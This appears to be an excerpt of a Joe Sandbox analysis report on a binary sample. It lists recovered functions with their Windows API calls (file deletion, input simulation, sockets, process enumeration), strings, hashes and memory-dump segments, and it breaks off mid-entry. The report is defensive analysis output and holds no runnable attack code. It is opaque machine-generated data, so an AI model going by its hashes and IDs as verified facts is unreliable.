                                                      • API String ID: 540024437-0
                                                      • Opcode ID: af779e249f53ad0eaf8df257916f6ad27578d9ed587a1e0531b5773904b33a2f
                                                      • Instruction ID: 4c203d65a34314422ef598bf8fbba81b29366b695cacbdfec08b103e95f38c56
                                                      • Opcode Fuzzy Hash: af779e249f53ad0eaf8df257916f6ad27578d9ed587a1e0531b5773904b33a2f
                                                      • Instruction Fuzzy Hash: 6C4196316001409FD714DF24C498B6ABBE5AF46328F6891D8D856AF2A2C771ED86CBE1
                                                      Function 00E6B952 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • _free.LIBCMT ref: 00E6B9D4
                                                      • _free.LIBCMT ref: 00E6B9F8
                                                      • _free.LIBCMT ref: 00E6BB7F
                                                      • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00ED3700), ref: 00E6BB91
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00F0121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00E6BC09
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00F01270,000000FF,?,0000003F,00000000,?), ref: 00E6BC36
                                                      • _free.LIBCMT ref: 00E6BD4B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                      • String ID:
                                                      • API String ID: 314583886-0
                                                      • Opcode ID: f10315632ff17765f2257c555ff9ab75712cebbeca7121ec1e739e25f8f59c01
                                                      • Instruction ID: ef272e22f5382494105387d6412b6b8f20df0c33814a95a02cc242bc4e0db3ab
                                                      • Opcode Fuzzy Hash: f10315632ff17765f2257c555ff9ab75712cebbeca7121ec1e739e25f8f59c01
                                                      • Instruction Fuzzy Hash: B7C12A71A842089FDB20DF79AC41AAABBF9EF41394F14619AE594F7252E7308E81C750
                                                      Function 00E9D3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E33AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E33A97,?,?,00E32E7F,?,?,?,00000000), ref: 00E33AC2
                                                        • Part of subcall function 00E9E199: GetFileAttributesW.KERNEL32(?,00E9CF95), ref: 00E9E19A
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E9D420
                                                      • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E9D470
                                                      • FindNextFileW.KERNEL32(00000000,00000010), ref: 00E9D481
                                                      • FindClose.KERNEL32(00000000), ref: 00E9D498
                                                      • FindClose.KERNEL32(00000000), ref: 00E9D4A1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                      • String ID: \*.*
                                                      • API String ID: 2649000838-1173974218
                                                      • Opcode ID: a57c2dbe410ff416c08e5259be31fedacecaebe1bd0261f6ff22815e069d76a3
                                                      • Instruction ID: bc2935559dcecd9f58315832a5eec5a38a9c1ecd1a84ac077efda5b49673bb11
                                                      • Opcode Fuzzy Hash: a57c2dbe410ff416c08e5259be31fedacecaebe1bd0261f6ff22815e069d76a3
                                                      • Instruction Fuzzy Hash: 3531707100C3559FC704EF64D8558AFBBE8AE91314F446A2DF4E5731A1EB21AA09CB63
                                                      Function 00E6E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: __floor_pentium4
                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                      • API String ID: 4168288129-2761157908
                                                      • Opcode ID: 54e9296a078322a9e8991ba9fd9ada940e5023c5eb1ba9af3e7b5fddf793a82c
                                                      • Instruction ID: a83b344b2b4eda44b03b1d0501f212a0f77c5043f72db34d53b1ad645d1c1818
                                                      • Opcode Fuzzy Hash: 54e9296a078322a9e8991ba9fd9ada940e5023c5eb1ba9af3e7b5fddf793a82c
                                                      • Instruction Fuzzy Hash: 8FC25B71E486288FDB25CE28ED407EAB7B5EB44345F1451EAD80EF7281E774AE858F40
                                                      Function 00EA648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 00EA64DC
                                                      • CoInitialize.OLE32(00000000), ref: 00EA6639
                                                      • CoCreateInstance.OLE32(00ECFCF8,00000000,00000001,00ECFB68,?), ref: 00EA6650
                                                      • CoUninitialize.OLE32 ref: 00EA68D4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                      • String ID: .lnk
                                                      • API String ID: 886957087-24824748
                                                      • Opcode ID: b2e3a162891a2e073e51d1bb48c60f3288a328d8ac6491c2885f0c7e2507afdc
                                                      • Instruction ID: 92012fdafc706899d19b504c162a9a38b88337cc58bcb88b86e66b2b7e38cfd3
                                                      • Opcode Fuzzy Hash: b2e3a162891a2e073e51d1bb48c60f3288a328d8ac6491c2885f0c7e2507afdc
                                                      • Instruction Fuzzy Hash: 01D16971608301AFC314EF24C885E6BBBE8FF99304F14596DF595AB291EB70E905CB92
                                                      Function 00EB22DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetForegroundWindow.USER32(?,?,00000000), ref: 00EB22E8
                                                        • Part of subcall function 00EAE4EC: GetWindowRect.USER32(?,?), ref: 00EAE504
                                                      • GetDesktopWindow.USER32 ref: 00EB2312
                                                      • GetWindowRect.USER32(00000000), ref: 00EB2319
                                                      • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00EB2355
                                                      • GetCursorPos.USER32(?), ref: 00EB2381
                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00EB23DF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                      • String ID:
                                                      • API String ID: 2387181109-0
                                                      • Opcode ID: 2517f57d92005935f4a2267c3d41a995716f00fba9ba936f0fe57ff833ef7a8e
                                                      • Instruction ID: 382b2f9f89286223963bdef3fd8c16a8e178598233995b5bd5abc42fcf5eb5d4
                                                      • Opcode Fuzzy Hash: 2517f57d92005935f4a2267c3d41a995716f00fba9ba936f0fe57ff833ef7a8e
                                                      • Instruction Fuzzy Hash: 3731DE72104306AFCB20DF55C848E9BB7E9FF88314F10192DFA89A7191DB35E909CB92
                                                      Function 00EA9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00EA9B78
                                                      • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00EA9C8B
                                                        • Part of subcall function 00EA3874: GetInputState.USER32 ref: 00EA38CB
                                                        • Part of subcall function 00EA3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EA3966
                                                      • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00EA9BA8
                                                      • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00EA9C75
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                      • String ID: *.*
                                                      • API String ID: 1972594611-438819550
                                                      • Opcode ID: 28b72539c3dc90c1f8097b8ad0a1c6630e3b5d40aa9d630cb998413a46b7078d
                                                      • Instruction ID: 93f28f0c69b507148abf75c3cde116d967e0a46a3e35265396bbb66b5274e88d
                                                      • Opcode Fuzzy Hash: 28b72539c3dc90c1f8097b8ad0a1c6630e3b5d40aa9d630cb998413a46b7078d
                                                      • Instruction Fuzzy Hash: E34172719046099FCF14DFA4C949AEEBBF4EF0A314F245065E815B6192DB31AE45CF60
                                                      Function 00E9DBBE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29filestringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,"R), ref: 00E9DBCE
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00E9DBDD
                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00E9DBEE
                                                      • FindClose.KERNEL32(00000000), ref: 00E9DBFA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirstlstrlen
                                                      • String ID: "R
                                                      • API String ID: 2695905019-1746183819
                                                      • Opcode ID: bee5bb5f03cc6b7bee2d54bdf5bf7e1bf7cfb7ed9b2a6eafb249f76ff6f332dc
                                                      • Instruction ID: ab37177fe052ef144b93175d76fe25b811edd98db0dc58f66466e7bfe3d6d094
                                                      • Opcode Fuzzy Hash: bee5bb5f03cc6b7bee2d54bdf5bf7e1bf7cfb7ed9b2a6eafb249f76ff6f332dc
                                                      • Instruction Fuzzy Hash: A9F0EC704149245B8B246F7DDC0DCAAB76C9F01334B244712F439E20F0EBB15D5AC5D5
                                                      Function 00E4997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00E49BB2
                                                      • DefDlgProcW.USER32(?,?,?,?,?), ref: 00E49A4E
                                                      • GetSysColor.USER32(0000000F), ref: 00E49B23
                                                      • SetBkColor.GDI32(?,00000000), ref: 00E49B36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Color$LongProcWindow
                                                      • String ID:
                                                      • API String ID: 3131106179-0
                                                      • Opcode ID: f088425575d14ef03fea7cd952319659deb8d6965f3339caaaad1ed02c49623d
                                                      • Instruction ID: ad8b209df580c503cbea699f9fd7bcaf1dd37d2fdcbabb6d0f13936151c409a8
                                                      • Opcode Fuzzy Hash: f088425575d14ef03fea7cd952319659deb8d6965f3339caaaad1ed02c49623d
                                                      • Instruction Fuzzy Hash: 8CA12C70108444AEE724AB3DAD48EBB36DDEB42358B242219F54AF6593CA26DD01E375
                                                      Function 00EB1806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00EB304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00EB307A
                                                        • Part of subcall function 00EB304E: _wcslen.LIBCMT ref: 00EB309B
                                                      • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00EB185D
                                                      • WSAGetLastError.WSOCK32 ref: 00EB1884
                                                      • bind.WSOCK32(00000000,?,00000010), ref: 00EB18DB
                                                      • WSAGetLastError.WSOCK32 ref: 00EB18E6
                                                      • closesocket.WSOCK32(00000000), ref: 00EB1915
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                      • String ID:
                                                      • API String ID: 1601658205-0
                                                      • Opcode ID: cc4eebd6d05f28b9c47f054df620d9a8c557dc463be7eede7cc11ca964b2ec03
                                                      • Instruction ID: b8c815fa86943f20da11e1462800f93ae93254f57562f366c52663d6f1b50aaa
                                                      • Opcode Fuzzy Hash: cc4eebd6d05f28b9c47f054df620d9a8c557dc463be7eede7cc11ca964b2ec03
                                                      • Instruction Fuzzy Hash: A351E571A002006FDB14AF24C89AF6A7BE5AB44718F589098FA197F3D3C771AD41CBA1
                                                      Function 00EC1C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                      • String ID:
                                                      • API String ID: 292994002-0
                                                      • Opcode ID: 4e3240786027adf0d5cb3abe2c8b6efe5526243280b8d64d1feb9659a7245251
                                                      • Instruction ID: 308b9dadb65b4bed9d7d076cc010572650cedc2d4d0eaa14c0ee70e266ee61dc
                                                      • Opcode Fuzzy Hash: 4e3240786027adf0d5cb3abe2c8b6efe5526243280b8d64d1feb9659a7245251
                                                      • Instruction Fuzzy Hash: D32182317402105FD7248F1AC944F66BBE5AF96319F29A0ACE84AAB352C772DC43CB90
                                                      Function 00E38060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                      • API String ID: 0-1546025612
                                                      • Opcode ID: 49682511f2ddce2fa60389ebaa2f4f630d68afb80b95cbdb9d708d5d6957ffc9
                                                      • Instruction ID: 46f675ff8022bf35b6604cfe9e25462df0200d6532983852ce8a68a61c324216
                                                      • Opcode Fuzzy Hash: 49682511f2ddce2fa60389ebaa2f4f630d68afb80b95cbdb9d708d5d6957ffc9
                                                      • Instruction Fuzzy Hash: F8A27F71A0061ACBDF24CF58C9457EEBBB1FF54318F2491AAE819B7285DB709D81CB90
                                                      Function 00E54CE8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00E628E9,(,00E54CBE,00000000,00EF88B8,0000000C,00E54E15,(,00000002,00000000,?,00E628E9,00000003,00E62DF7,?,?), ref: 00E54D09
                                                      • TerminateProcess.KERNEL32(00000000,?,00E628E9,00000003,00E62DF7,?,?,?,00E5E6D1,?,00EF8A48,00000010,00E34F4A,?,?,00000000), ref: 00E54D10
                                                      • ExitProcess.KERNEL32 ref: 00E54D22
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentExitTerminate
                                                      • String ID: (
                                                      • API String ID: 1703294689-2063206799
                                                      • Opcode ID: 01053c5b28704dc88558ae406840442f9a4fb2eee10cdaf2ccb5a8b9052e24df
                                                      • Instruction ID: b372235ee7a0d356928925ab6e10ff34fbd53c063341e3cc23c45f2a23e435d4
                                                      • Opcode Fuzzy Hash: 01053c5b28704dc88558ae406840442f9a4fb2eee10cdaf2ccb5a8b9052e24df
                                                      • Instruction Fuzzy Hash: FFE0BFB1400148AFCF11AF55ED09E583B79FB4178AB145464FC09AB162CB36DD86CB50
                                                      Function 00E98298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00E982AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: lstrlen
                                                      • String ID: ($tb$|
                                                      • API String ID: 1659193697-1968160224
                                                      • Opcode ID: 6e73b2c47a1106b4f2860deb1341d7a8cb06580c449ef3df5ac57da61a16f3a4
                                                      • Instruction ID: ef8cbc5838d8a7055253382d8d912daeb683a5fbc3206a82648df7064b57ed37
                                                      • Opcode Fuzzy Hash: 6e73b2c47a1106b4f2860deb1341d7a8cb06580c449ef3df5ac57da61a16f3a4
                                                      • Instruction Fuzzy Hash: FF324775A007059FCB28CF59C5819AAB7F0FF48714B15D46EE49AEB3A1EB70E941CB40
                                                      Function 00EBA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00EBA6AC
                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00EBA6BA
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • Process32NextW.KERNEL32(00000000,?), ref: 00EBA79C
                                                      • CloseHandle.KERNEL32(00000000), ref: 00EBA7AB
                                                        • Part of subcall function 00E4CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00E73303,?), ref: 00E4CE8A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                      • String ID:
                                                      • API String ID: 1991900642-0
                                                      • Opcode ID: d41827d925bd3bb3f7017ac87ad13b121e05e8752e4fe2f29fdaf26aee33cc21
                                                      • Instruction ID: 2430166acebc65686ae053435e089a6164763502142e21392b079033a3bf6010
                                                      • Opcode Fuzzy Hash: d41827d925bd3bb3f7017ac87ad13b121e05e8752e4fe2f29fdaf26aee33cc21
                                                      • Instruction Fuzzy Hash: F9517D71508300AFC714DF25D886A6BBBF8FF89714F04992DF589A7262EB70D904CB92
                                                      Function 00E9AA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 00E9AAAC
                                                      • SetKeyboardState.USER32(00000080), ref: 00E9AAC8
                                                      • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 00E9AB36
                                                      • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 00E9AB88
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: KeyboardState$InputMessagePostSend
                                                      • String ID:
                                                      • API String ID: 432972143-0
                                                      • Opcode ID: 5a54987e35d6673abd568a532b8d2a7140b4d8f145538d7af669410755dc050a
                                                      • Instruction ID: 4f9d7d23f481e0fa7e542af5da14e6f0bcd84d5a98473705e2032001518b3d9d
                                                      • Opcode Fuzzy Hash: 5a54987e35d6673abd568a532b8d2a7140b4d8f145538d7af669410755dc050a
